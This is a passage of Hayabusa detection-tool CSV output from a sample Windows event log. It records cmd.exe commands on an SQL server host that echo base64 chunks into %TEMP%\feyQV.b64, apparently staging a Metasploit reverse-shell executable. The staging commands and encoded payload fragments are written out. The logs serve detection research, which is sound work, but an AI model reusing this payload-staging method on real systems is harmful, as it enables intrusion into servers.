AADBAAAAAAAAAAAAAAAAAAAA2pcWAFUAAAAAAAAWAAAAAACGAABWAAASAABIAAAEAAAAAAAAAAAAAAAAANQAAADkAAAAALgAuiMAAAAAAOQAAACYAO8AAAAAAAAAAAAAAAAAAAAAAAAAAACKAAAAAAAAAAAgLQAAdwAAAAAAAAAAAAAAAGsAAAAAAI0AAAAAAGsAAADgAAAAAAAAAABYAAAAAO2gAAAA3gAAAAAAVSIAAABPAAAAXgAAAAAAAAAAAAAAAAAAAAAAAAB/1wCEADwAAAAAAJ0AAAAAALkAAAA+rjcAAAAAAAC0bwAAAACLAAAAAAAAAAAAAAAAAAB8AJ8AAAAjBQAAUAAAAAAAoAAAAAAAAAAAAAAAAAAAAGD0AAAAAADgAAAAAAAAAAAAAAB/AAAAAAAAAAAAAAAAAAAAAAAA8wAAAAAAAAAATgAAAAAAxmsAAAAAPwAAAAAAAAAAAFQAAABSDAAAp1oAAAAAAAAAKwAAAJMAnQDkAADRAAAhAAARAAAAAAAAAFwAXQCjpAAAAAAAAOsAAAAAAAAAAABLAAAAAAAAAAAAAAAAAAAOAAAhGhZPAAAAjM8AAHDPAAAAAAAAUs8AAEbPAAA6zwAAKs8AABjPAAAIzwAA8s4AAN7OAADGzgAAus4AAKrOAACSzgAAes4AAF7OAABOzgAAQM4AAPrLAAAKzAAAJMwAAD7MAABMzAAAXswAAGrMAAB0zAAAhswAAJrMAACyzAAAwMwAANrMAADyzAAADM0AACbNAAA+zQAAYM0AAGjNAAB6zQAAis0AAKDNAACwzQAAwM0AANLNAADgzQAA7s0AAATOAAAWzgAANM4AAAAAAADEyQAA2MsAAMbLAAC4ywAAqMsAAJjLAACEywAAeMsAAGjLAABYywAASssAAELLAAA4ywAAKssAABTLAAAKywAAAMsAAPbKAADsygAA4MoAANjKAADOygAAxMoAALTKAACkygAAmsoAAJLKAACIygAAfsoAAHTKAABsygAAZMoAAFzKAABSygAASMoAAD7KAAA0ygAAKsoAACDKAAAWygAACsoAAALKAAD6yQAA6skAAODJAADWyQAAzMkAAOzLAADczwAA0M8AAAAAAAC6zwAAsM8AAAAAAAAHAACABAAAgAkAAIA0AACADgAAgAwAAIAVAACAFwAAgAMAAIASAACACgAAgJcAAIBzAACAdAAAgG8AAIAAAAAAAAAAADaAwUoAAAAAAgAAAEoAAAAAAAAAACABAAAAAAAAAAAAAADgP3sUrkfheoQ//Knx0k1iUD8AAAAAAABQPwAAAAAAQI9AAAAAAAAA8D8AAAAAAAAAAI3ttaD3xrA+AAAAAB8AAAA7AAAAWgAAAHgAAACXAAAAtQAAANQAAADzAAAAEQEAADABAABOAQAAMgEAAFEBAAAAAAAAHwAAAD0AAABcAAAAegAAAJkAAAC4AAAA1gAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:21.772 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo APUAAAATAQAAKG51bGwpAAAwMTIzNDU2Nzg5YWJjZGVmAAAAADAxMjM0NTY3ODlBQkNERUYAAAAAMDEyMzQ1Njc4OWFiY2RlZgAAAAAwMTIzNDU2Nzg5QUJDREVGAAAAAAAAAAAAACRAAAAAAAAAJMC4HoXrUbieP5qZmZmZmbk/FCcAADz5QAAZJwAALPlAAB0nAAAY+UAAHicAAAz5QAAmJwAA+PhAACgnAADg+EAAMycAAMj4QAA0JwAArPhAADUnAACM+EAANicAAGz4QAA3JwAATPhAADgnAAA4+EAAOScAABj4QAA6JwAABPhAADsnAADs90AAPCcAAND3QAA9JwAArPdAAD4nAACM90AAPycAAGz3QABAJwAAVPdAAEEnAAA090AAQicAACT3QABDJwAADPdAAEQnAAD09kAARScAAND2QABGJwAAtPZAAEcnAACY9kAASCcAAHz2QABJJwAAZPZAAEonAABA9kAASycAABz2QABMJwAABPZAAE0nAADw9UAATicAAMz1QABPJwAAuPVAAFAnAACo9UAAUScAAJT1QABSJwAAgPVAAFMnAABs9UAAVCcAAFz1QABVJwAASPVAAFYnAAAw9UAAVycAAAz1QABrJwAA7PRAAGwnAADM9EAAbScAALD0QAB1JwAAkPRAAPkqAACA9EAA/CoAAFz0QAAAAAAAAAAAAEphbgBGZWIATWFyAEFwcgBNYXkASnVuAEp1bABBdWcAU2VwAE9jdABOb3YARGVjAFN1bgBNb24AVHVlAFdlZABUaHUARnJpAFNhdAA8AkEAMAJBACgCQQAgAkEAGAJBAAwCQQAwMTIzNDU2Nzg5AAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMDAwMCAQEBAQABAQEBAQEBAQEBAAMCAQICAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAwIDAwEDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEDAgMDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQD5AQEA/NDU2Nzg5Ojs8PUBAQEBAQEAAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGUBAQEBAQBobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:22.047 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8AAAAAAAAAAP////8qt0AAPrdAAKzIAAAAAAAAAAAAAB7LAADIwAAA8McAAAAAAAAAAAAAYs8AAAzAAADkxwAAAAAAAAAAAACWzwAAAMAAAITJAAAAAAAAAAAAAKTPAACgwQAAeMkAAAAAAAAAAAAAxM8AAJTBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIzPAABwzwAAAAAAAFLPAABGzwAAOs8AACrPAAAYzwAACM8AAPLOAADezgAAxs4AALrOAACqzgAAks4AAHrOAABezgAATs4AAEDOAAD6ywAACswAACTMAAA+zAAATMwAAF7MAABqzAAAdMwAAIbMAACazAAAsswAAMDMAADazAAA8swAAAzNAAAmzQAAPs0AAGDNAABozQAAes0AAIrNAACgzQAAsM0AAMDNAADSzQAA4M0AAO7NAAAEzgAAFs4AADTOAAAAAAAAxMkAANjLAADGywAAuMsAAKjLAACYywAAhMsAAHjLAABoywAAWMsAAErLAABCywAAOMsAACrLAAAUywAACssAAADLAAD2ygAA7MoAAODKAADYygAAzsoAAMTKAAC0ygAApMoAAJrKAACSygAAiMoAAH7KAAB0ygAAbMoAAGTKAABcygAAUsoAAEjKAAA+ygAANMoAACrKAAAgygAAFsoAAArKAAACygAA+skAAOrJAADgyQAA1skAAMzJAADsywAA3M8AANDPAAAAAAAAus8AALDPAAAAAAAABwAAgAQAAIAJAACANAAAgA4AAIAMAACAFQAAgBcAAIADAACAEgAAgAoAAICXAACAcwAAgHQAAIBvAACAAAAAABMBX2lvYgAAWAJmcHJpbnRmALcCc3RyY2hyAACOAV9wY3R5cGUAYQBfX21iX2N1cl9tYXgAAEkCZXhpdAAAPQJhdG9pAAAVAV9pc2N0eXBlAACeAnByaW50ZgAArwJzaWduYWwAAJECbWFsbG9jAABAAmNhbGxvYwAATwJmZmx1c2gAAEwCZmNsb3NlAACcAnBlcnJvcgAAVwJmb3BlbgCkAnFzb3J0APEAX2Z0b2wAwQJzdHJuY3B5AMUCc3Ryc3RyAADAAnN0cm5jbXAAXgJmcmVlAADIAF9lcnJubwAAegBfX3BfX3dlbnZpcm9uAG0AX19wX19lbnZpcm9uAACnAnJlYWxsb2MAxAJzdHJzcG4AAJsCbW9kZgAAvAJzdHJlcnJvcgAA4wJ3Y3NjcHkAAOYCd2NzbGVuAACzAF9jbG9zZQAA6AJ3Y3NuY21wAMMCc3RycmNocgBNU1ZDUlQuZGxsAABVAF9fZGxsb25leGl0AIYBX29u>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:22.320 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXhpdADTAF9leGl0AEgAX1hjcHRGaWx0ZXIAZABfX3BfX19pbml0ZW52AFgAX19nZXRtYWluYXJncwAPAV9pbml0dGVybQCDAF9fc2V0dXNlcm1hdGhlcnIAAJ0AX2FkanVzdF9mZGl2AABqAF9fcF9fY29tbW9kZQAAbwBfX3BfX2Ztb2RlAACBAF9fc2V0X2FwcF90eXBlAADKAF9leGNlcHRfaGFuZGxlcjMAALcAX2NvbnRyb2xmcAAAHQNTZXRMYXN0RXJyb3IAAO4ARnJlZUVudmlyb25tZW50U3RyaW5nc1cATwFHZXRFbnZpcm9ubWVudFN0cmluZ3NXAAD1AUdsb2JhbEZyZWUAAAkBR2V0Q29tbWFuZExpbmVXAFYDVGxzQWxsb2MAAFcDVGxzRnJlZQCMAER1cGxpY2F0ZUhhbmRsZQA6AUdldEN1cnJlbnRQcm9jZXNzABoDU2V0SGFuZGxlSW5mb3JtYXRpb24AAC4AQ2xvc2VIYW5kbGUAwAFHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQC8AEZpbGVUaW1lVG9TeXN0ZW1UaW1lAADYAUdldFRpbWVab25lSW5mb3JtYXRpb24AALsARmlsZVRpbWVUb0xvY2FsRmlsZVRpbWUATgNTeXN0ZW1UaW1lVG9GaWxlVGltZQAATwNTeXN0ZW1UaW1lVG9UelNwZWNpZmljTG9jYWxUaW1lAEkDU2xlZXAA6gBGb3JtYXRNZXNzYWdlQQAAaQFHZXRMYXN0RXJyb3IAAIUDV2FpdEZvclNpbmdsZU9iamVjdABJAENyZWF0ZUV2ZW50QQAALANTZXRTdGRIYW5kbGUAABADU2V0RmlsZVBvaW50ZXIAAE0AQ3JlYXRlRmlsZUEAUABDcmVhdGVGaWxlVwCMAUdldE92ZXJsYXBwZWRSZXN1bHQAgwBEZXZpY2VJb0NvbnRyb2wAWgFHZXRGaWxlSW5mb3JtYXRpb25CeUhhbmRsZQAAUgJMb2NhbEZyZWUAXgFHZXRGaWxlVHlwZQBaAENyZWF0ZU11dGV4QQAAGQJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAHoARGVsZXRlQ3JpdGljYWxTZWN0aW9uAI8ARW50ZXJDcml0aWNhbFNlY3Rpb24AALgCUmVsZWFzZU11dGV4AAALA1NldEV2ZW50AABHAkxlYXZlQ3JpdGljYWxTZWN0aW9uAABRA1Rlcm1pbmF0ZVByb2Nlc3MAAFIBR2V0RXhpdENvZGVQcm9jZXNzAADfAUdldFZlcnNpb25FeEEAmAFHZXRQcm9jQWRkcmVzcwAASAJMb2FkTGlicmFyeUEAAJcDV3JpdGVGaWxlAKsCUmVhZEZpbGUAAIcCUGVla05hbWVkUGlwZQBLRVJORUwzMi5kbGwAAB0AQWxsb2NhdGVBbmRJbml0aWFsaXplU2lkAADhAEZy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:22.593 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZWVTaWQAQURWQVBJMzIuZGxsAABXU09DSzMyLmRsbAA5AFdTQVNlbmQANABXU0FSZWN2AFdTMl8zMi5kbGwAAMUBX3N0cm5pY21wAL8BX3N0cmR1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAZAAAAAEAAAABAAAAAQAAAAAAAACAw8kBAAAAAOALQQAyAAAAQgAAAEsAAABQAAAAWgAAAF8AAABiAAAAYwAAAGQAAAAlczogQ2Fubm90IHVzZSBjb25jdXJyZW5jeSBsZXZlbCBncmVhdGVyIHRoYW4gdG90YWwgbnVtYmVyIG9mIHJlcXVlc3RzCgAlczogSW52YWxpZCBDb25jdXJyZW5jeSBbUmFuZ2UgMC4uJWRdCgAAJXM6IGludmFsaWQgVVJMCgAAAAAlczogd3JvbmcgbnVtYmVyIG9mIGFyZ3VtZW50cwoAAFVzZXItQWdlbnQ6AEFjY2VwdDoASG9zdDoAAABQcm94eS1BdXRob3JpemF0aW9uOiBCYXNpYyAAUHJveHkgY3JlZGVudGlhbHMgdG9vIGxvbmcKAEF1dGhvcml6YXRpb246IEJhc2ljIAAAAEF1dGhlbnRpY2F0aW9uIGNyZWRlbnRpYWxzIHRvbyBsb25nCgAAAABDb29raWU6IAAAAAANCgAAQ2Fubm90IG1peCBQVVQgYW5kIEhFQUQKAAAAAENhbm5vdCBtaXggUE9TVCBhbmQgSEVBRAoAAABDYW5ub3QgbWl4IFBPU1QvUFVUIGFuZCBIRUFECgAAAEludmFsaWQgbnVtYmVyIG9mIHJlcXVlc3RzCgBuOmM6dDpiOlQ6cDp1OnY6cmtWaHdpeDp5Ono6QzpIOlA6QTpnOlg6ZGU6U3EAAABiZ2NvbG9yPXdoaXRlAAAAVG90YWwgb2YgJWQgcmVxdWVzdHMgY29tcGxldGVkCgAlcwoALi5kb25lCgBGaW5pc2hlZCAlZCByZXF1ZXN0cwoAAABhcHJfc29ja2V0X2Nvbm5lY3QoKQAAAAAKVGVzdCBhYm9ydGVkIGFmdGVyIDEwIGZhaWx1cmVzCgoAAAAKU2VydmVyIHRpbWVkIG91dAoKAGFwcl9wb2xsAAAAAGFwcl9zb2NrYWRkcl9pbmZvX2dldCgpIGZvciAlcwAAZXJyb3IgY3JlYXRpbmcgcmVxdWVzdCBidWZmZXI6IG91dCBvZiBtZW1vcnkKAAAASU5GTzogJXMgaGVhZGVyID09IAotLS0KJXMKLS0tCgBSZXF1ZXN0IHRvbyBsb25nCgAAACVzICVzIEhUVFAvMS4wDQolcyVzJXNDb250ZW50LWxlbmd0aDogJXUNCkNvbnRlbnQtdHlwZTogJXMNCiVzDQoAAAAAUFVUAFBPU1QAAAAAdGV4dC9wbGFpbgAAJXMgJXMgSFRUUC8xLjAN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:22.867 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo CiVzJXMlcyVzDQoAAEhFQUQAAAAAR0VUAENvbm5lY3Rpb246IEtlZXAtQWxpdmUNCgAAAABBY2NlcHQ6ICovKg0KAAAAVXNlci1BZ2VudDogQXBhY2hlQmVuY2gvAAAAADIuMwBIb3N0OiAAAGFwcl9wb2xsc2V0X2NyZWF0ZSBmYWlsZWQAAAAoYmUgcGF0aWVudCklcwAALi4uAAoAAABbdGhyb3VnaCAlczolZF0gAAAAAEJlbmNobWFya2luZyAlcyAAAAAAJXM6ICVzICglZCkKAAAAAFNlbmQgcmVxdWVzdCBmYWlsZWQhCgAAAFNlbmQgcmVxdWVzdCB0aW1lZCBvdXQhCgAAAAAlcwklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAoAAABzdGFydHRpbWUJc2Vjb25kcwljdGltZQlkdGltZQl0dGltZQl3YWl0CgAAAENhbm5vdCBvcGVuIGdudXBsb3Qgb3V0cHV0IGZpbGUAJWQsJS4zZgoAAAAAUGVyY2VudGFnZSBzZXJ2ZWQsVGltZSBpbiBtcwoAAABDYW5ub3Qgb3BlbiBDU1Ygb3V0cHV0IGZpbGUAdwAAACAgJWQlJSAgJTVJNjRkCgAgMTAwJSUgICU1STY0ZCAobG9uZ2VzdCByZXF1ZXN0KQoAAAAgMCUlICA8MD4gKG5ldmVyKQoAAApQZXJjZW50YWdlIG9mIHRoZSByZXF1ZXN0cyBzZXJ2ZWQgd2l0aGluIGEgY2VydGFpbiB0aW1lIChtcykKAABUb3RhbDogICAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABQcm9jZXNzaW5nOiAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABDb25uZWN0OiAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAAAgICAgICAgICAgICAgIG1pbiAgIGF2ZyAgIG1heAoAAFdBUk5JTkc6IFRoZSBtZWRpYW4gYW5kIG1lYW4gZm9yIHRoZSB0b3RhbCB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAAAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgdG90YWwgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgBXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgd2FpdGluZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:23.140 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHdhaXRpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAAAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgcHJvY2Vzc2luZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHByb2Nlc3NpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG5vdCB3aXRoaW4gYSBub3JtYWwgZGV2aWF0aW9uCiAgICAgICAgVGhlc2UgcmVzdWx0cyBhcmUgcHJvYmFibHkgbm90IHRoYXQgcmVsaWFibGUuCgAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG1vcmUgdGhhbiB0d2ljZSB0aGUgc3RhbmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhlc2UgcmVzdWx0cyBhcmUgTk9UIHJlbGlhYmxlLgoAAAAAVG90YWw6ICAgICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAV2FpdGluZzogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAUHJvY2Vzc2luZzogJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAQ29ubmVjdDogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAICAgICAgICAgICAgICBtaW4gIG1lYW5bKy8tc2RdIG1lZGlhbiAgIG1heAoAAAAACkNvbm5lY3Rpb24gVGltZXMgKG1zKQoAICAgICAgICAgICAgICAgICAgICAgICAgJS4yZiBrYi9zIHRvdGFsCgAAAAAgICAgICAgICAgICAg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:23.414 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ICAgICAgICAgICAlLjJmIGtiL3Mgc2VudAoAVHJhbnNmZXIgcmF0ZTogICAgICAgICAgJS4yZiBbS2J5dGVzL3NlY10gcmVjZWl2ZWQKAFRpbWUgcGVyIHJlcXVlc3Q6ICAgICAgICUuM2YgW21zXSAobWVhbiwgYWNyb3NzIGFsbCBjb25jdXJyZW50IHJlcXVlc3RzKQoAAABUaW1lIHBlciByZXF1ZXN0OiAgICAgICAlLjNmIFttc10gKG1lYW4pCgAAAFJlcXVlc3RzIHBlciBzZWNvbmQ6ICAgICUuMmYgWyMvc2VjXSAobWVhbikKAAAAAEhUTUwgdHJhbnNmZXJyZWQ6ICAgICAgICVJNjRkIGJ5dGVzCgAAAABUb3RhbCBQVVQ6ICAgICAgICAgICAgICAlSTY0ZAoAAFRvdGFsIFBPU1RlZDogICAgICAgICAgICVJNjRkCgAAVG90YWwgdHJhbnNmZXJyZWQ6ICAgICAgJUk2NGQgYnl0ZXMKAAAAAEtlZXAtQWxpdmUgcmVxdWVzdHM6ICAgICVkCgBOb24tMnh4IHJlc3BvbnNlczogICAgICAlZAoAV3JpdGUgZXJyb3JzOiAgICAgICAgICAgJWQKACAgIChDb25uZWN0OiAlZCwgUmVjZWl2ZTogJWQsIExlbmd0aDogJWQsIEV4Y2VwdGlvbnM6ICVkKQoAAEZhaWxlZCByZXF1ZXN0czogICAgICAgICVkCgBDb21wbGV0ZSByZXF1ZXN0czogICAgICAlZAoAVGltZSB0YWtlbiBmb3IgdGVzdHM6ICAgJS4zZiBzZWNvbmRzCgAAAENvbmN1cnJlbmN5IExldmVsOiAgICAgICVkCgBEb2N1bWVudCBMZW5ndGg6ICAgICAgICAldSBieXRlcwoAAABEb2N1bWVudCBQYXRoOiAgICAgICAgICAlcwoAU2VydmVyIFBvcnQ6ICAgICAgICAgICAgJWh1CgAAAABTZXJ2ZXIgSG9zdG5hbWU6ICAgICAgICAlcwoAU2VydmVyIFNvZnR3YXJlOiAgICAgICAgJXMKAAoKAAA8L3RhYmxlPgoAAAAAAAAAPHRyICVzPjx0aCAlcz5Ub3RhbDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggJXM+UHJvY2Vzc2luZzo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggJXM+Q29ubmVjdDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgA8dHIg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:23.687 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo JXM+PHRoICVzPiZuYnNwOzwvdGg+IDx0aCAlcz5taW48L3RoPiAgIDx0aCAlcz5hdmc8L3RoPiAgIDx0aCAlcz5tYXg8L3RoPjwvdHI+CgA8dHIgJXM+PHRoICVzIGNvbHNwYW49ND5Db25ubmVjdGlvbiBUaW1lcyAobXMpPC90aD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49MiAlcz4mbmJzcDs8L3RkPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHRvdGFsPC90ZD48L3RyPgoAADx0ciAlcz48dGQgY29sc3Bhbj0yICVzPiZuYnNwOzwvdGQ+PHRkIGNvbHNwYW49MiAlcz4lLjJmIGtiL3Mgc2VudDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VHJhbnNmZXIgcmF0ZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHJlY2VpdmVkPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+UmVxdWVzdHMgcGVyIHNlY29uZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZjwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkhUTUwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Ub3RhbCBQVVQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkPC90ZD48L3RyPgoAAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRvdGFsIFBPU1RlZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JUk2NGQ8L3RkPjwvdHI+CgAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VG90YWwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPktlZXAtQWxpdmUgcmVxdWVzdHM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+Tm9uLTJ4eCByZXNwb25zZXM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49NCAlcyA+ICAgKENvbm5lY3Q6ICVkLCBMZW5ndGg6ICVkLCBFeG